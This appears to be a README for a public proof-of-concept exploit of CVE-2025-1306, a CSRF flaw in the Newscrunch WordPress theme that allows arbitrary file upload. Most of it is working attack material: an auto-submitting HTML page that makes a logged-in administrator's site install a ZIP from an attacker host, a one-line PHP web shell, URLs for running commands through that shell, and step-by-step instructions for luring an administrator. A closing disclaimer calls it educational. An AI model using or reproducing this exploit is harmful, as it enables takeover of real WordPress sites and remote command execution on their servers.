# Newscrunch Exploit (CVE-2025-1306)



## 🚨 Overview
This exploit targets a **Cross-Site Request Forgery (CSRF) to Arbitrary File Upload** vulnerability (**CVE-2025-1306**) in the **Newscrunch WordPress theme**. Due to missing **nonce validation** in the `newscrunch_install_and_activate_plugin()` function, an **unauthenticated attacker** can trick a logged-in administrator into uploading arbitrary files to the server, leading to **Remote Code Execution (RCE).**

---
## 🔥 **Vulnerability Details**

- **CVE ID:** CVE-2025-1306
- **Affected Software:** Newscrunch WordPress Theme (<= 1.8.4)
- **CWE Classification:** [CWE-352 - Cross-Site Request Forgery (CSRF)](https://cwe.mitre.org/data/definitions/352.html)
- **CVSS Score:** **8.8 (HIGH)**
- **Vector:** `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H`
- **Published Date:** March 4, 2025

### **🛑 Severity & Impact**
- ✅ **Remote Code Execution (RCE)**
- ✅ **Full System Compromise**
- ✅ **CSRF-Based Arbitrary File Upload**
- ✅ **Unauthenticated Attack Vector**

**Exploitability:** Requires an administrator to visit a crafted malicious link.

---
## 📜 **Exploit Code**

This exploit forces an **authenticated administrator** to execute a **CSRF attack** that uploads a malicious ZIP file containing a web shell.

### **🔹 PoC - HTML Exploit**
```html
<!DOCTYPE html>
<html>
<head>
    <title>CSRF Exploit CVE-2025-1306 By Nxploit ,Khaled AlEnazi</title>
</head>
<body>
    <h2>Click anywhere to load content...</h2>

    <script>
        function sendExploit() {
            var form = document.createElement("form");
            form.method = "POST";
            form.action = "http://target.com/wp-admin/admin-ajax.php?action=newscrunch_install_activate_plugin";

            var input = document.createElement("input");
            input.type = "hidden";
            input.name = "plugin_url";
            input.value = "http://attacker.com/shell.zip";

            form.appendChild(input);
            document.body.appendChild(form);
            form.submit();
        }

        
        window.onload = function() {
            sendExploit();
        };
    </script>
</body>
</html>

```
📌 **Replace:**
- `http://target.com/` with the **vulnerable WordPress site**
- `http://attacker.com/shell.zip` with a **malicious ZIP payload** containing a web shell.

### **🔹 Malicious PHP Shell Example**
```php
<?php system($_GET['cmd']); ?>
```
📌 **After successful exploitation**, access the shell:
```bash
http://target.com/wp-content/plugins/shell.php?cmd=whoami
```

---
## 🚀 **How to Use**
1. **Host the HTML file** on an attacker-controlled website.
2. **Send the malicious link to an authenticated WordPress administrator.**
3. Once the admin visits the page, the shell gets uploaded automatically.
4. **Execute commands remotely** using:
   ```bash
   http://target.com/wp-content/plugins/shell.php?cmd=ls
   ```

---
## ⚠️ **Disclaimer**
**This tool is for educational and security research purposes only.** Unauthorized exploitation of vulnerabilities is illegal and punishable by law. The author is **not responsible** for any misuse or damages caused by this tool. Use responsibly.

---


